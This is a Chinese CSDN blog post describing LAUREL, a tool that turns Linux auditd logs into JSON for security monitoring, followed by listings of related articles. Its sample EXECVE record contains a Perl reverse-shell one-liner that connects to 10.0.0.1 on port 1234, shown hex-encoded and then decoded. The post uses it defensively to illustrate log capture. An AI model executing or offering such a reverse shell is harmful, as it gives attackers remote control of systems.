LAUREL:一款功能强大的Linux事件日志审计和转换工具

最新推荐文章于 2024-06-10 21:29:05 发布
最新推荐文章于 2024-06-10 21:29:05 发布
阅读量275 收藏
点赞数
文章标签: linux rust 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2201/article/details/128913214
版权
LAUREL是一款用于处理Linux系统事件日志的强大工具,它将原始日志转换为JSON格式,便于大规模分析。本文介绍了LAUREL的功能、安装过程、配置及使用方法,适合网络安全工程师学习。
摘要由CSDN通过智能技术生成

关于LAUREL

LAUREL是一款功能强大的Linus事件日志处理插件,可以帮助广大研究人员处理Linux系统事件日志,并对其进行后续处理,以便将日志应用到其他现代安全监控系统之中。

一般来说,Linux审计系统生成的日志文件会包含大量有价值的信息,特别适用于SIEM上下文中。但是原始的日志格式不适用于大规模分析,因为事件通常被分割成不同的行,必须使用消息标识符进行合并。文件和程序执行是通过PATH和EXECVE元素记录的,但字符串的有限字符集将导致许多条目采用十六进制编码。

LAUREL会对这些数据进行解析,并将其转换为基于JSON的日志格式,同时保留原始审计日志中的所有信息。

原始审计事件日志格式如下

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

将其转换为JSON格式后如下

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){o
最低0.47元/天 解锁文章
AIGC小王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux登录日志时间戳转换工具
08-20
Linux登录日志时间戳转换工具,主要用于Linux系统登录分析,方便溯源。
linux 开启审计功能及规则配置
m0_74282605的博客
02-09 2353
【推荐阅读】#查询审计功能#审计日志文件目录#编辑审计配置文件加入以下配置规则:#自定义审计规则#重启审计服务#查询审计配置规则。
实用的linux文件系统监控审计脚本工具
最新发布
wenyiking的博客
06-10 1556
本教程分享一个实用的linux文件系统监控审计脚本工具,可以辅助定位文件异常操作问题
Linux 配置用户命令日志审计功能
浪屋剑客
11-21 8736
目的:监控登陆上linux 系统服务器的用户,所使用过的命令。 采用以下步骤配置用户命令日志审计功能: 1.创建用户审计文件存放目录和审计日志文件 ;  mkdir -p /var/log/usermonitor/ 2.创建用户审计日志文件; echo usermonitor >/var/log/usermonitor/usermonitor.log 3.将日志文件所有者赋予一
15、Linux日志审计
carmi的博客
10-30 248
Linux日志审计 目录Linux日志审计1、日志文件的功能和分类2、日志文件保存位置和文件介绍3、管理日志服务的配置文件4、内核及系统日志5、日志消息的级别6、日志记录的一般格式7、用户日志分析8、程序日志分析9、日志服务器搭建10、补充1、日志文件的功能和分类 日志的功能 用于记录系统、程序运行中发生的各种事件。 通过阅读日志,有助于诊断和解决系统故障日志。 文件的分类 1、内核及系统日志:...
X18-操作系统 linux日志审计
h1825819493的博客
05-19 877
路径:/etc/logrotate.conf正常普通程序服务都可以通过这四个设置进行配置这两个文件的优先级高于上面的优先级。
Yanny-Laurel:对yanny laurel辩论的解释
05-18
该存储库包含著名的Yanny-Laurel录音,并使用Allen Downey的Allen Downey的ThinkDSP Think DSP: Digital Signal Processing in Python, by Allen B. Downey.
whatdoyouhear.now.sh:Yanny或Laurel
05-18
【标题】"whatdoyouhear.now.sh: Yanny或Laurel" 是一个与音频处理相关的项目,它涉及到一个著名的网络谜题,即“Yanny”还是“Laurel”。这个应用程序允许用户通过添加峰值/带通滤波器来调整音频,以便于分辨在一段...
android_vendor_xiaomi_laurel_sprout:小米A3供应商斑点
03-19
LineageOS是一个著名的Android开源项目(AOSP)分支,提供了许多自定义功能和改进。18.1代表了基于Android 11的版本,因为Android的版本号通常与LineageOS的版本号对应。这个压缩包可能包含所有必要的源代码、配置...
device_xiaomi_laurel_sprout:小米Mi A3的设备树
04-06
八核(4x2.0 GHz Kryo 260金牌和4x1.8 GHz Kryo 260银牌) 显卡 阿德雷诺610 记忆 4/6 GB 搭载Android版本 9.0 贮存 64/128 GB UFS 2.1 SIM卡 混合双卡(Nano-SIM,双待机) 微型SD 最高256 GB 电池 4030 ...
3D-Printer-Info:Laurel House 3D打印机资源
03-16
Laurel House 3D打印机资源 嗨,月桂树的房子成员! 如果您在此页面上,则正在寻找资源以开始使用3D打印! 目录 基本说明 切片 找到您要打印的很酷的东西! 结帐或或 从上方的链接中获取.obj或.stl文件,然后对...
日志格式转换工具
09-11
可以将windows系统的日志转换linux日志格式,可传到LINUX日志文件服务器上。
Linux日志巡检之日常操作及安全审计
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
04-21 7192
一、背景 本文专门针对Linux系统运维当中相关日志,总结概述经常要执行的操作,以备参考辅助。 二、常见日志 /var/log/message 系统启动后的信息和错误日志,是Red Hat Linux中最常用的日志之一,一般系统整体运行信息都会记录在该日志里,其中也包含系统启动期间的日志。此外,mail,cron,daemon,kern和auth等内容也会记录在var/log/messages日志中。 /var/log/daemon.log:记录包含各种系统后台守护进程日志信息 /var/log/maill
适用于 Linux 系统的综合日志审计和报告
ITmoster的博客
07-28 772
EventLog Analyzer是一个全面的系统日志管理解决方案,可监控所有日志以维护安全的Linux环境。
【项目记录】Linux日志审计系统
linjiuxiansheng的博客
03-26 1019
本作品实现了对客户端的Linux系统日志审计以及警报。使用者只需预留用于警报的邮箱,在客户端部署软件,即可实现对Linux系统日志的转发分析以及通过客户预留的邮箱进行警报,适用于Linux个体以及集群对系统的实时监听。实现日志转发、审计和报警的工作、一键部署rsyslog环境、利用rsyslog转发日志、分析处理日志mysql数据库、用java搭建可视化界面与WEB可视化界面并实现警报功能。
操作系统安全:Linux安全审计Linux日志详解
wangyuxiang946的博客
04-26 6219
这篇文章给大家介绍Linux用来做安全审计日志有哪些,解析日志字段含义。
LINUX日志审计
2302_77424749的博客
05-06 1143
5.在状态码前面可查看该账户访问过的文件夹,状态码后面可查看该账户所使用的浏览器客户端页面的来源地址以及浏览器类型和版本号等信息以便溯源。5.btmp日志:记录了登录失败的登录信息,需要使用 lastb 进行查看。1.首先可看登录次数较多的IP地址以及账号,查看非本地IP地址或者异常IP,是否有尝试破解登录等操作。3.utmp日志:记录了当前正在登录的系统的信息,需要使用 who 命令或者 w 命令。4.wtmp日志:记录了当前和历史登录的用户信息,需要使用 last 命令进行查看。
linux工具-journalctl查询日志
weixin_30663391的博客
04-12 748
  有时候,当linux服务启动失败的时候,系统会提示我们使用journalctl -xe命令来查询详细信息,定位服务不能启动的原因。   journalctl用来查询 systemd-journald 服务收集到的日志。systemd-journald 服务是 systemd init 系统提供的收集系统日志的服务。 命令格式为: journalctl [OPTIONS…] [...
Bash Cookbook: Automating Tasks with Unix Shell Scripting
"bash Cookbook" 是一本由 Newham, Cameron、Vossen, J.P. 和 Albing, Carl 合著的书籍,由 Oreilly & ...无论你是系统管理员、开发者还是对命令行工具感兴趣的个人,都可以通过这本书获得实用的技巧和解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值